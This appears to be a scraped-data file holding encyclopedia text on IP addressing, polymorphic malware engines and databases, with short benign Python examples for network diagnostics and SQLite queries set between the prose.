IPv6, a prefix delegation can be handled similarly, to make changes as rare as feasible. In a typical home or small-office setup, a single router is the only device visible to an Internet service provider (ISP), and the ISP may try to provide a configuration that is as stable as feasible, i.e. sticky. 
On the local network of the home or business, a local DHCP server may be designed to provide sticky IPv4 configurations, and the ISP may provide a sticky IPv6 prefix delegation, giving clients the option to use sticky IPv6 addresses. Sticky should not be confused with static; sticky configurations have no guarantee of stability, while static configurations are used indefinitely and only changed deliberately. Address block 169.254.0.0 16 is defined for the special use of link-local addressing for IPv4 networks. 15 In IPv6, every interface, whether using static or dynamic addresses, also receives a link-local address automatically in the block fe80:: 10. 15 These addresses are only valid on the link, such as a local network segment or point-to-point connection, to which a host is connected. These addresses are not routable and, like private addresses, cannot be the source or destination of packets traversing the Internet. When the link-local IPv4 address block was reserved, no standards existed for mechanisms of address autoconfiguration. Filling the void, Microsoft developed a protocol called Automatic Private IP Addressing (APIPA), whose first public implementation appeared in Windows 98. 16 APIPA has been deployed on millions of machines and became a de facto standard in the industry. In May 2005, the IETF defined a formal standard for it. 17 An IP address conflict occurs when two devices on the same local physical or wireless network claim to have the same IP address. A second assignment of an address generally stops the IP functionality of one or both of the devices. Many modern operating systems notify the administrator of IP address conflicts. 18 19 When IP addresses are assigned by multiple people and systems with differing methods, any of them may be at fault. 20 21 22 23 24 If one of the devices involved in the conflict is the default gateway access beyond the LAN for all devices on the LAN, all devices may be impaired. IP addresses are classified into several classes of operational characteristics: unicast, multicast, anycast and broadcast addressing. The most common concept of an IP address is in unicast addressing, available in both IPv4 and IPv6. It normally refers to a single sender or a single receiver, and can be used for both sending and receiving. Usually, a unicast address is associated with a single device or host, but a device or host may have more than one unicast address. Sending the same data to multiple unicast addresses requires the sender to send all the data many times over, once for each recipient. Broadcasting is an addressing technique available in IPv4 to address data to all possible destinations on a network in one transmission operation as an all-hosts broadcast. All receivers capture the network packet. The address 255.255.255.255 is used for network broadcast. In addition, a more limited directed broadcast uses the all-ones host address with the network prefix. For example, the destination address used for directed broadcast to devices on the network 192.0.2.0 24 is 192.0.2.255. 25 IPv6 does not implement broadcast addressing and replaces it with multicast to the specially defined all-nodes multicast address. A multicast address is associated with a group of interested receivers. In IPv4, addresses 224.0.0.0 through 239.255.255.255 (the former Class D addresses) are designated as multicast addresses. 26 IPv6 uses the address block with the prefix ff00:: 8 for multicast. 
In either case, the sender sends a single datagram from its unicast address to the multicast group address and the intermediary routers take care of making copies and sending them to all interested receivers (those that have joined the corresponding multicast group). Like broadcast and multicast, anycast is a one-to-many routing topology. However, the data stream is not transmitted to all receivers, just the one which the router decides is closest in the network. Anycast addressing is a built-in feature of IPv6. 27 28 In IPv4, anycast addressing is implemented with Border Gateway Protocol using the shortest-path metric to choose destinations. Anycast methods are useful for global load balancing and are commonly used in distributed DNS systems. A host may use geolocation to deduce the geographic position of its communicating peer. 29 30 This is typically done by retrieving geolocation info about the IP address of the other node from a database. 31 A public IP address is a globally routable unicast IP address, meaning that the address is not an address reserved for use in private networks, such as those reserved by RFC 1918, or the various IPv6 address formats of local scope or site-local scope, for example for link-local addressing. Public IP addresses may be used for communication between hosts on the global Internet. In a home situation, a public IP address is the IP address assigned to the home's network by the ISP. In this case, it is also locally visible by logging into the router configuration. 32 Most public IP addresses change, and relatively often. Any type of IP address that changes is called a dynamic IP address. In home networks, the ISP usually assigns a dynamic IP. If an ISP gave a home network an unchanging address, it is more likely to be abused by customers who host websites from home, or by hackers who can try the same IP address over and over until they breach a network. 32 Multiple client devices can appear to share an IP address, either because they are part of a shared web hosting service environment or because an IPv4 network address translator (NAT) or proxy server acts as an intermediary agent on behalf of the client, in which case the real originating IP address is masked from the server receiving a request. A common practice is to have a NAT mask many devices in a private network. Only the public interface(s) of the NAT needs to have an Internet-routable address. 33 The NAT device maps different IP addresses on the private network to different TCP or UDP port numbers on the public network. In residential networks, NAT functions are usually implemented in a residential gateway. In this scenario, the computers connected to the router have private IP addresses and the router has a public address on its external interface to communicate on the Internet. The internal computers appear to share one public IP address. In March 2024, the Supreme Court of Canada decided that IP addresses were protected private information under the Canadian Charter of Rights and Freedoms, with police searches requiring a warrant in order to obtain them. 34 IP addresses are considered personal data by the European Commission and are protected by the General Data Protection Regulation. 35 Computer operating systems provide various diagnostic tools to examine network interfaces and address configuration. 
Microsoft Windows provides the command-line interface tools ipconfig 36 and netsh, while users of Unix-like systems may use the ifconfig, netstat, route, lanstat, fstat, and iproute2 utilities to accomplish the task. 37 |
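Those utilities can also be invoked from Python when a quick look at the interface configuration is needed inside a notebook. A rough sketch, assuming the named commands are actually installed on the host:

import platform
import subprocess

# Pick a platform-appropriate command; these choices are assumptions about
# what is typically available, not an exhaustive mapping.
if platform.system() == "Windows":
    cmd = ["ipconfig", "/all"]
elif platform.system() == "Darwin":
    cmd = ["ifconfig"]
else:
    cmd = ["ip", "addr"]  # iproute2; older Unix-like systems may only have ifconfig

result = subprocess.run(cmd, capture_output=True, text=True)
print(result.stdout)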
246 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Polymorphic_engine | A polymorphic engine (sometimes called mutation engine or mutating engine) is a software component that uses polymorphic code to alter the payload while preserving the same functionality. Polymorphic engines are used almost exclusively in malware, with the purpose of being harder for antivirus software to detect. They do so either by encrypting or obfuscating the malware payload. One common deployment is a file binder that weaves malware into normal files, such as office documents. Since this type of malware is usually polymorphic, it is also known as a polymorphic packer. The engine of the Virut botnet is an example of a polymorphic engine. 1 |
247 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Database | In computing, a database is an organized collection of data or a type of data store based on the use of a database management system (DBMS), the software that interacts with end users, applications, and the database itself to capture and analyze the data. The DBMS additionally encompasses the core facilities provided to administer the database. The sum total of the database, the DBMS and the associated applications can be referred to as a database system. Often the term "database" is also used loosely to refer to any of the DBMS, the database system or an application associated with the database. Small databases can be stored on a file system, while large databases are hosted on computer clusters or cloud storage. The design of databases spans formal techniques and practical considerations, including data modeling, efficient data representation and storage, query languages, security and privacy of sensitive data, and distributed computing issues, including supporting concurrent access and fault tolerance. Computer scientists may classify database management systems according to the database models that they support. Relational databases became dominant in the 1980s. These model data as rows and columns in a series of tables, and the vast majority use SQL for writing and querying data. In the 2000s, non-relational databases became popular, collectively referred to as NoSQL, because they use different query languages. Formally, a "database" refers to a set of related data accessed through the use of a "database management system" (DBMS), which is an integrated set of computer software that allows users to interact with one or more databases and provides access to all of the data contained in the database (although restrictions may exist that limit access to particular data). The DBMS provides various functions that allow entry, storage and retrieval of large quantities of information and provides ways to manage how that information is organized. Because of the close relationship between them, the term "database" is often used casually to refer to both a database and the DBMS used to manipulate it. Outside the world of professional information technology, the term database is often used to refer to any collection of related data (such as a spreadsheet or a card index) as size and usage requirements typically necessitate use of a database management system. 1 Existing DBMSs provide various functions that allow management of a database and its data which can be classified into four main functional groups: Both a database and its DBMS conform to the principles of a particular database model. 5 "Database system" refers collectively to the database model, database management system, and database. 6 Physically, database servers are dedicated computers that hold the actual databases and run only the DBMS and related software. Database servers are usually multiprocessor computers, with generous memory and RAID disk arrays used for stable storage. Hardware database accelerators, connected to one or more servers via a high-speed channel, are also used in large-volume transaction processing environments. DBMSs are found at the heart of most database applications. DBMSs may be built around a custom multitasking kernel with built-in networking support, but modern DBMSs typically rely on a standard operating system to provide these functions. 
citation needed Since DBMSs comprise a significant market, computer and storage vendors often take into account DBMS requirements in their own development plans. 7 Databases and DBMSs can be categorized according to the database model(s) that they support (such as relational or XML), the type(s) of computer they run on (from a server cluster to a mobile phone), the query language(s) used to access the database (such as SQL or XQuery), and their internal engineering, which affects performance, scalability, resilience, and security. The sizes, capabilities, and performance of databases and their respective DBMSs have grown in orders of magnitude. These performance increases were enabled by the technology progress in the areas of processors, computer memory, computer storage, and computer networks. The concept of a database was made possible by the emergence of direct access storage media such as magnetic disks, which became widely available in the mid 1960s; earlier systems relied on sequential storage of data on magnetic tape. The subsequent development of database technology can be divided into three eras based on data model or structure: navigational, 8 SQL relational, and post-relational. The two main early navigational data models were the hierarchical model and the CODASYL model (network model). These were characterized by the use of pointers (often physical disk addresses) to follow relationships from one record to another. The relational model, first proposed in 1970 by Edgar F. Codd, departed from this tradition by insisting that applications should search for data by content, rather than by following links. The relational model employs sets of ledger-style tables, each used for a different type of entity. Only in the mid 1980s did computing hardware become powerful enough to allow the wide deployment of relational systems (DBMSs plus applications). By the early 1990s, however, relational systems dominated in all large-scale data processing applications, and as of 2018 update they remain dominant: IBM Db2, Oracle, MySQL, and Microsoft SQL Server are the most searched DBMS. 9 The dominant database language, standardized SQL for the relational model, has influenced database languages for other data models. citation needed Object databases were developed in the 1980s to overcome the inconvenience of object relational impedance mismatch, which led to the coining of the term "post-relational" and also the development of hybrid object relational databases. The next generation of post-relational databases in the late 2000s became known as NoSQL databases, introducing fast key value stores and document-oriented databases. A competing "next generation" known as NewSQL databases attempted new implementations that retained the relational SQL model while aiming to match the high performance of NoSQL compared to commercially available relational DBMSs. The introduction of the term database coincided with the availability of direct-access storage (disks and drums) from the mid 1960s onwards. The term represented a contrast with the tape-based systems of the past, allowing shared interactive use rather than daily batch processing. The Oxford English Dictionary cites a 1962 report by the System Development Corporation of California as the first to use the term "data-base" in a specific technical sense. 10 As computers grew in speed and capability, a number of general-purpose database systems emerged; by the mid 1960s a number of such systems had come into commercial use. 
Interest in a standard began to grow, and Charles Bachman, author of one such product, the Integrated Data Store (IDS), founded the Database Task Group within CODASYL, the group responsible for the creation and standardization of COBOL. In 1971, the Database Task Group delivered their standard, which generally became known as the CODASYL approach, and soon a number of commercial products based on this approach entered the market. The CODASYL approach offered applications the ability to navigate around a linked data set which was formed into a large network. Applications could find records by one of three methods: Later systems added B-trees to provide alternate access paths. Many CODASYL databases also added a declarative query language for end users (as distinct from the navigational API). However, CODASYL databases were complex and required significant training and effort to produce useful applications. IBM also had its own DBMS in 1966, known as Information Management System (IMS). IMS was a development of software written for the Apollo program on the System 360. IMS was generally similar in concept to CODASYL, but used a strict hierarchy for its model of data navigation instead of CODASYL's network model. Both concepts later became known as navigational databases due to the way data was accessed: the term was popularized by Bachman's 1973 Turing Award presentation The Programmer as Navigator. IMS is classified by IBM as a hierarchical database. IDMS and Cincom Systems' TOTAL broken anchor databases are classified as network databases. IMS remains in use as of 2014 update . 11 Edgar F. Codd worked at IBM in San Jose, California, in one of their offshoot offices that were primarily involved in the development of hard disk systems. He was unhappy with the navigational model of the CODASYL approach, notably the lack of a "search" facility. In 1970, he wrote a number of papers that outlined a new approach to database construction that eventually culminated in the groundbreaking A Relational Model of Data for Large Shared Data Banks. 12 In this paper, he described a new system for storing and working with large databases. Instead of records being stored in some sort of linked list of free-form records as in CODASYL, Codd's idea was to organize the data as a number of "tables", each table being used for a different type of entity. Each table would contain a fixed number of columns containing the attributes of the entity. One or more columns of each table were designated as a primary key by which the rows of the table could be uniquely identified; cross-references between tables always used these primary keys, rather than disk addresses, and queries would join tables based on these key relationships, using a set of operations based on the mathematical system of relational calculus (from which the model takes its name). Splitting the data into a set of normalized tables (or relations) aimed to ensure that each "fact" was only stored once, thus simplifying update operations. Virtual tables called views could present the data in different ways for different users, but views could not be directly updated. Codd used mathematical terms to define the model: relations, tuples, and domains rather than tables, rows, and columns. The terminology that is now familiar came from early implementations. Codd would later criticize the tendency for practical implementations to depart from the mathematical foundations on which the model was based. 
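The relational ideas just described (one table per entity type, primary keys for cross-references, joins expressed declaratively) can be sketched with Python's built-in sqlite3 module; the person/address/phone schema below is invented for illustration and does not come from any particular system.

import sqlite3

con = sqlite3.connect(":memory:")
cur = con.cursor()

# One normalized table per entity type, linked by logical keys, not disk addresses.
cur.executescript("""
CREATE TABLE person  (person_id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE address (address_id INTEGER PRIMARY KEY,
                      person_id INTEGER REFERENCES person(person_id),
                      city TEXT);
CREATE TABLE phone   (phone_id INTEGER PRIMARY KEY,
                      person_id INTEGER REFERENCES person(person_id),
                      number TEXT);
""")
cur.execute("INSERT INTO person (person_id, name) VALUES (1, 'Ada')")
cur.execute("INSERT INTO address (person_id, city) VALUES (1, 'London')")
cur.execute("INSERT INTO phone (person_id, number) VALUES (1, '555-0100')")

# A declarative query: it states what is wanted; the DBMS picks the access path.
for row in cur.execute("""
    SELECT p.name, a.city, ph.number
    FROM person p
    JOIN address a ON a.person_id = p.person_id
    JOIN phone  ph ON ph.person_id = p.person_id"""):
    print(row)
con.close()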
The use of primary keys (user-oriented identifiers) to represent cross-table relationships, rather than disk addresses, had two primary motivations. From an engineering perspective, it enabled tables to be relocated and resized without expensive database reorganization. But Codd was more interested in the difference in semantics: the use of explicit identifiers made it easier to define update operations with clean mathematical definitions, and it also enabled query operations to be defined in terms of the established discipline of first-order predicate calculus; because these operations have clean mathematical properties, it becomes possible to rewrite queries in provably correct ways, which is the basis of query optimization. There is no loss of expressiveness compared with the hierarchic or network models, though the connections between tables are no longer so explicit. In the hierarchic and network models, records were allowed to have a complex internal structure. For example, the salary history of an employee might be represented as a "repeating group" within the employee record. In the relational model, the process of normalization led to such internal structures being replaced by data held in multiple tables, connected only by logical keys. For instance, a common use of a database system is to track information about users, their name, login information, various addresses and phone numbers. In the navigational approach, all of this data would be placed in a single variable-length record. In the relational approach, the data would be normalized into a user table, an address table and a phone number table (for instance). Records would be created in these optional tables only if the address or phone numbers were actually provided. As well as identifying rows records using logical identifiers rather than disk addresses, Codd changed the way in which applications assembled data from multiple records. Rather than requiring applications to gather data one record at a time by navigating the links, they would use a declarative query language that expressed what data was required, rather than the access path by which it should be found. Finding an efficient access path to the data became the responsibility of the database management system, rather than the application programmer. This process, called query optimization, depended on the fact that queries were expressed in terms of mathematical logic. Codd's paper was picked up by two people at Berkeley, Eugene Wong and Michael Stonebraker. They started a project known as INGRES using funding that had already been allocated for a geographical database project and student programmers to produce code. Beginning in 1973, INGRES delivered its first test products which were generally ready for widespread use in 1979. INGRES was similar to System R in a number of ways, including the use of a "language" for data access, known as QUEL. Over time, INGRES moved to the emerging SQL standard. IBM itself did one test implementation of the relational model, PRTV, and a production one, Business System 12, both now discontinued. Honeywell wrote MRDS for Multics, and now there are two new implementations: Alphora Dataphor and Rel. Most other DBMS implementations usually called relational are actually SQL DBMSs. In 1970, the University of Michigan began development of the MICRO Information Management System 13 based on D.L. Childs' Set-Theoretic Data model. 14 15 16 MICRO was used to manage very large data sets by the US Department of Labor, the U.S. 
Environmental Protection Agency, and researchers from the University of Alberta, the University of Michigan, and Wayne State University. It ran on IBM mainframe computers using the Michigan Terminal System. 17 The system remained in production until 1998. In the 1970s and 1980s, attempts were made to build database systems with integrated hardware and software. The underlying philosophy was that such integration would provide higher performance at a lower cost. Examples were IBM System 38, the early offering of Teradata, and the Britton Lee, Inc. database machine. Another approach to hardware support for database management was ICL's CAFS accelerator, a hardware disk controller with programmable search capabilities. In the long term, these efforts were generally unsuccessful because specialized database machines could not keep pace with the rapid development and progress of general-purpose computers. Thus most database systems nowadays are software systems running on general-purpose hardware, using general-purpose computer data storage. However, this idea is still pursued in certain applications by some companies like Netezza and Oracle (Exadata). IBM started working on a prototype system loosely based on Codd's concepts as System R in the early 1970s. The first version was ready in 1974 5, and work then started on multi-table systems in which the data could be split so that all of the data for a record (some of which is optional) did not have to be stored in a single large "chunk". Subsequent multi-user versions were tested by customers in 1978 and 1979, by which time a standardized query language SQL citation needed had been added. Codd's ideas were establishing themselves as both workable and superior to CODASYL, pushing IBM to develop a true production version of System R, known as SQL DS, and, later, Database 2 (IBM Db2). Larry Ellison's Oracle Database (or more simply, Oracle) started from a different chain, based on IBM's papers on System R. Though Oracle V1 implementations were completed in 1978, it was not until Oracle Version 2 when Ellison beat IBM to market in 1979. 18 Stonebraker went on to apply the lessons from INGRES to develop a new database, Postgres, which is now known as PostgreSQL. PostgreSQL is often used for global mission-critical applications (the .org and .info domain name registries use it as their primary data store, as do many large companies and financial institutions). In Sweden, Codd's paper was also read and Mimer SQL was developed in the mid 1970s at Uppsala University. In 1984, this project was consolidated into an independent enterprise. Another data model, the entity relationship model, emerged in 1976 and gained popularity for database design as it emphasized a more familiar description than the earlier relational model. Later on, entity relationship constructs were retrofitted as a data modeling construct for the relational model, and the difference between the two has become irrelevant. citation needed The 1980s ushered in the age of desktop computing. The new computers empowered their users with spreadsheets like Lotus 1 2 3 and database software like dBASE. The dBASE product was lightweight and easy for any computer user to understand out of the box. C. Wayne Ratliff, the creator of dBASE, stated: "dBASE was different from programs like BASIC, C, FORTRAN, and COBOL in that a lot of the dirty work had already been done. 
The data manipulation is done by dBASE instead of by the user, so the user can concentrate on what he is doing, rather than having to mess with the dirty details of opening, reading, and closing files, and managing space allocation. 19 dBASE was one of the top selling software titles in the 1980s and early 1990s. The 1990s, along with a rise in object-oriented programming, saw a growth in how data in various databases were handled. Programmers and designers began to treat the data in their databases as objects. That is to say that if a person's data were in a database, that person's attributes, such as their address, phone number, and age, were now considered to belong to that person instead of being extraneous data. This allows for relations between data to be related to objects and their attributes and not to individual fields. 20 The term "object relational impedance mismatch" described the inconvenience of translating between programmed objects and database tables. Object databases and object relational databases attempt to solve this problem by providing an object-oriented language (sometimes as extensions to SQL) that programmers can use as alternative to purely relational SQL. On the programming side, libraries known as object relational mappings (ORMs) attempt to solve the same problem. XML databases are a type of structured document-oriented database that allows querying based on XML document attributes. XML databases are mostly used in applications where the data is conveniently viewed as a collection of documents, with a structure that can vary from the very flexible to the highly rigid: examples include scientific articles, patents, tax filings, and personnel records. NoSQL databases are often very fast, do not require fixed table schemas, avoid join operations by storing denormalized data, and are designed to scale horizontally. In recent years, there has been a strong demand for massively distributed databases with high partition tolerance, but according to the CAP theorem, it is impossible for a distributed system to simultaneously provide consistency, availability, and partition tolerance guarantees. A distributed system can satisfy any two of these guarantees at the same time, but not all three. For that reason, many NoSQL databases are using what is called eventual consistency to provide both availability and partition tolerance guarantees with a reduced level of data consistency. NewSQL is a class of modern relational databases that aims to provide the same scalable performance of NoSQL systems for online transaction processing (read-write) workloads while still using SQL and maintaining the ACID guarantees of a traditional database system. Databases are used to support internal operations of organizations and to underpin online interactions with customers and suppliers (see Enterprise software). Databases are used to hold administrative information and more specialized data, such as engineering data or economic models. Examples include computerized library systems, flight reservation systems, computerized parts inventory systems, and many content management systems that store websites as collections of webpages in a database. One way to classify databases involves the type of their contents, for example: bibliographic, document-text, statistical, or multimedia objects. Another way is by their application area, for example: accounting, music compositions, movies, banking, manufacturing, or insurance. 
A third way is by some technical aspect, such as the database structure or interface type. This section lists a few of the adjectives used to characterize different kinds of databases. Connolly and Begg define database management system (DBMS) as a "software system that enables users to define, create, maintain and control access to the database. 24 Examples of DBMS's include MySQL, MariaDB, PostgreSQL, Microsoft SQL Server, Oracle Database, and Microsoft Access. The DBMS acronym is sometimes extended to indicate the underlying database model, with RDBMS for the relational, OODBMS for the object (oriented) and ORDBMS for the object relational model. Other extensions can indicate some other characteristics, such as DDBMS for a distributed database management systems. The functionality provided by a DBMS can vary enormously. The core functionality is the storage, retrieval and update of data. Codd proposed the following functions and services a fully-fledged general purpose DBMS should provide: 25 It is also generally to be expected the DBMS will provide a set of utilities for such purposes as may be necessary to administer the database effectively, including import, export, monitoring, defragmentation and analysis utilities. 26 The core part of the DBMS interacting between the database and the application interface sometimes referred to as the database engine. Often DBMSs will have configuration parameters that can be statically and dynamically tuned, for example the maximum amount of main memory on a server the database can use. The trend is to minimize the amount of manual configuration, and for cases such as embedded databases the need to target zero-administration is paramount. The large major enterprise DBMSs have tended to increase in size and functionality and have involved up to thousands of human years of development effort throughout their lifetime. a Early multi-user DBMS typically only allowed for the application to reside on the same computer with access via terminals or terminal emulation software. The client server architecture was a development where the application resided on a client desktop and the database on a server allowing the processing to be distributed. This evolved into a multitier architecture incorporating application servers and web servers with the end user interface via a web browser with the database only directly connected to the adjacent tier. 28 A general-purpose DBMS will provide public application programming interfaces (API) and optionally a processor for database languages such as SQL to allow applications to be written to interact with and manipulate the database. A special purpose DBMS may use a private API and be specifically customized and linked to a single application. For example, an email system performs many of the functions of a general-purpose DBMS such as message insertion, message deletion, attachment handling, blocklist lookup, associating messages an email address and so forth however these functions are limited to what is required to handle email. External interaction with the database will be via an application program that interfaces with the DBMS. 29 This can range from a database tool that allows users to execute SQL queries textually or graphically, to a website that happens to use a database to store and search information. A programmer will code interactions to the database (sometimes referred to as a datasource) via an application program interface (API) or via a database language. 
The particular API or language chosen will need to be supported by DBMS, possibly indirectly via a preprocessor or a bridging API. Some API's aim to be database independent, ODBC being a commonly known example. Other common API's include JDBC and ADO.NET. Database languages are special-purpose languages, which allow one or more of the following tasks, sometimes distinguished as sublanguages: Database languages are specific to a particular data model. Notable examples include: A database language may also incorporate features like: Database storage is the container of the physical materialization of a database. It comprises the internal (physical) level in the database architecture. It also contains all the information needed (e.g., metadata, "data about the data", and internal data structures) to reconstruct the conceptual level and external level from the internal level when needed. Databases as digital objects contain three layers of information which must be stored: the data, the structure, and the semantics. Proper storage of all three layers is needed for future preservation and longevity of the database. 33 Putting data into permanent storage is generally the responsibility of the database engine a.k.a. "storage engine". Though typically accessed by a DBMS through the underlying operating system (and often using the operating systems' file systems as intermediates for storage layout), storage properties and configuration settings are extremely important for the efficient operation of the DBMS, and thus are closely maintained by database administrators. A DBMS, while in operation, always has its database residing in several types of storage (e.g., memory and external storage). The database data and the additional needed information, possibly in very large amounts, are coded into bits. Data typically reside in the storage in structures that look completely different from the way the data look at the conceptual and external levels, but in ways that attempt to optimize (the best possible) these levels' reconstruction when needed by users and programs, as well as for computing additional types of needed information from the data (e.g., when querying the database). Some DBMSs support specifying which character encoding was used to store data, so multiple encodings can be used in the same database. Various low-level database storage structures are used by the storage engine to serialize the data model so it can be written to the medium of choice. Techniques such as indexing may be used to improve performance. Conventional storage is row-oriented, but there are also column-oriented and correlation databases. Often storage redundancy is employed to increase performance. A common example is storing materialized views, which consist of frequently needed external views or query results. Storing such views saves the expensive computing them each time they are needed. The downsides of materialized views are the overhead incurred when updating them to keep them synchronized with their original updated database data, and the cost of storage redundancy. Occasionally a database employs storage redundancy by database objects replication (with one or more copies) to increase data availability (both to improve performance of simultaneous multiple end-user accesses to the same database object, and to provide resiliency in a case of partial failure of a distributed database). Updates of a replicated object need to be synchronized across the object copies. In many cases, the entire database is replicated. 
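As a small, concrete illustration of the indexing idea mentioned above, here is a sketch using sqlite3; the orders table is hypothetical, and SQLite is used only because it ships with Python.

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE orders (order_id INTEGER PRIMARY KEY, customer TEXT, total REAL)")
con.executemany("INSERT INTO orders (customer, total) VALUES (?, ?)",
                [("acme", 10.0), ("acme", 25.5), ("globex", 7.25)])

# A secondary index lets the engine locate matching rows without scanning the table.
con.execute("CREATE INDEX idx_orders_customer ON orders (customer)")

# EXPLAIN QUERY PLAN reports whether the index is used for this predicate.
for row in con.execute("EXPLAIN QUERY PLAN SELECT total FROM orders WHERE customer = 'acme'"):
    print(row)
con.close()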
With data virtualization, the data used remains in its original locations and real-time access is established to allow analytics across multiple sources. This can aid in resolving some technical difficulties such as compatibility problems when combining data from various platforms, lowering the risk of error caused by faulty data, and guaranteeing that the newest data is used. Furthermore, avoiding the creation of a new database containing personal information can make it easier to comply with privacy regulations. However, with data virtualization, the connection to all necessary data sources must be operational as there is no local copy of the data, which is one of the main drawbacks of the approach. 34 Database security deals with all various aspects of protecting the database content, its owners, and its users. It ranges from protection from intentional unauthorized database uses to unintentional database accesses by unauthorized entities (e.g., a person or a computer program). Database access control deals with controlling who (a person or a certain computer program) are allowed to access what information in the database. The information may comprise specific database objects (e.g., record types, specific records, data structures), certain computations over certain objects (e.g., query types, or specific queries), or using specific access paths to the former (e.g., using specific indexes or other data structures to access information). Database access controls are set by special authorized (by the database owner) personnel that uses dedicated protected security DBMS interfaces. This may be managed directly on an individual basis, or by the assignment of individuals and privileges to groups, or (in the most elaborate models) through the assignment of individuals and groups to roles which are then granted entitlements. Data security prevents unauthorized users from viewing or updating the database. Using passwords, users are allowed access to the entire database or subsets of it called "subschemas". For example, an employee database can contain all the data about an individual employee, but one group of users may be authorized to view only payroll data, while others are allowed access to only work history and medical data. If the DBMS provides a way to interactively enter and update the database, as well as interrogate it, this capability allows for managing personal databases. Data security in general deals with protecting specific chunks of data, both physically (i.e., from corruption, or destruction, or removal; e.g., see physical security), or the interpretation of them, or parts of them to meaningful information (e.g., by looking at the strings of bits that they comprise, concluding specific valid credit-card numbers; e.g., see data encryption). Change and access logging records who accessed which attributes, what was changed, and when it was changed. Logging services allow for a forensic database audit later by keeping a record of access occurrences and changes. Sometimes application-level code is used to record changes rather than leaving this in the database. Monitoring can be set up to attempt to detect security breaches. Therefore, organizations must take database security seriously because of the many benefits it provides. Organizations will be safeguarded from security breaches and hacking activities like firewall intrusion, virus spread, and ransom ware. This helps in protecting the company's essential information, which cannot be shared with outsiders at any cause. 
35 Database transactions can be used to introduce some level of fault tolerance and data integrity after recovery from a crash. A database transaction is a unit of work, typically encapsulating a number of operations over a database (e.g., reading a database object, writing, acquiring or releasing a lock, etc.), an abstraction supported in database and also other systems. Each transaction has well defined boundaries in terms of which program code executions are included in that transaction (determined by the transaction's programmer via special transaction commands). The acronym ACID describes some ideal properties of a database transaction: atomicity, consistency, isolation, and durability. A database built with one DBMS is not portable to another DBMS (i.e., the other DBMS cannot run it). However, in some situations, it is desirable to migrate a database from one DBMS to another. The reasons are primarily economical (different DBMSs may have different total costs of ownership or TCOs), functional, and operational (different DBMSs may have different capabilities). The migration involves the database's transformation from one DBMS type to another. The transformation should maintain (if possible) the database related application (i.e., all related application programs) intact. Thus, the database's conceptual and external architectural levels should be maintained in the transformation. It may be desired that also some aspects of the architecture internal level are maintained. A complex or large database migration may be a complicated and costly (one-time) project by itself, which should be factored into the decision to migrate. This is in spite of the fact that tools may exist to help migration between specific DBMSs. Typically, a DBMS vendor provides tools to help import databases from other popular DBMSs. After designing a database for an application, the next stage is building the database. Typically, an appropriate general-purpose DBMS can be selected to be used for this purpose. A DBMS provides the needed user interfaces to be used by database administrators to define the needed application's data structures within the DBMS's respective data model. Other user interfaces are used to select needed DBMS parameters (like security related, storage allocation parameters, etc.). When the database is ready (all its data structures and other needed components are defined), it is typically populated with initial application's data (database initialization, which is typically a distinct project; in many cases using specialized DBMS interfaces that support bulk insertion) before making it operational. In some cases, the database becomes operational while empty of application data, and data are accumulated during its operation. After the database is created, initialized and populated it needs to be maintained. Various database parameters may need changing and the database may need to be tuned (tuning) for better performance; application's data structures may be changed or added, new related application programs may be written to add to the application's functionality, etc. Sometimes it is desired to bring a database back to a previous state (for many reasons, e.g., cases when the database is found corrupted due to a software error, or if it has been updated with erroneous data). 
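The ACID transaction behaviour described earlier in this passage can be sketched with sqlite3: the two updates below form a single unit of work that is either committed in full or rolled back. The account table and amounts are invented for illustration.

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE account (name TEXT PRIMARY KEY, balance REAL NOT NULL)")
con.executemany("INSERT INTO account VALUES (?, ?)", [("alice", 100.0), ("bob", 50.0)])
con.commit()

try:
    # Atomicity: both updates succeed together or neither is applied.
    con.execute("UPDATE account SET balance = balance - 30 WHERE name = 'alice'")
    con.execute("UPDATE account SET balance = balance + 30 WHERE name = 'bob'")
    con.commit()
except sqlite3.Error:
    con.rollback()  # on failure, return to the last committed state

print(list(con.execute("SELECT * FROM account")))
con.close()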
To achieve this, a backup operation is done occasionally or continuously, where each desired database state (i.e., the values of its data and their embedding in database's data structures) is kept within dedicated backup files (many techniques exist to do this effectively). When it is decided by a database administrator to bring the database back to this state (e.g., by specifying this state by a desired point in time when the database was in this state), these files are used to restore that state. Static analysis techniques for software verification can be applied also in the scenario of query languages. In particular, the Abstract interpretation framework has been extended to the field of query languages for relational databases as a way to support sound approximation techniques. 36 The semantics of query languages can be tuned according to suitable abstractions of the concrete domain of data. The abstraction of relational database systems has many interesting applications, in particular, for security purposes, such as fine-grained access control, watermarking, etc. Other DBMS features might include: Increasingly, there are calls for a single system that incorporates all of these core functionalities into the same build, test, and deployment framework for database management and source control. Borrowing from other developments in the software industry, some market such offerings as "DevOps for database". 37 The first task of a database designer is to produce a conceptual data model that reflects the structure of the information to be held in the database. A common approach to this is to develop an entity relationship model, often with the aid of drawing tools. Another popular approach is the Unified Modeling Language. A successful data model will accurately reflect the possible state of the external world being modeled: for example, if people can have more than one phone number, it will allow this information to be captured. Designing a good conceptual data model requires a good understanding of the application domain; it typically involves asking deep questions about the things of interest to an organization, like "can a customer also be a supplier? , or "if a product is sold with two different forms of packaging, are those the same product or different products? , or "if a plane flies from New York to Dubai via Frankfurt, is that one flight or two (or maybe even three)? . The answers to these questions establish definitions of the terminology used for entities (customers, products, flights, flight segments) and their relationships and attributes. Producing the conceptual data model sometimes involves input from business processes, or the analysis of workflow in the organization. This can help to establish what information is needed in the database, and what can be left out. For example, it can help when deciding whether the database needs to hold historic data as well as current data. Having produced a conceptual data model that users are happy with, the next stage is to translate this into a schema that implements the relevant data structures within the database. This process is often called logical database design, and the output is a logical data model expressed in the form of a schema. Whereas the conceptual data model is (in theory at least) independent of the choice of database technology, the logical data model will be expressed in terms of a particular database model supported by the chosen DBMS. 
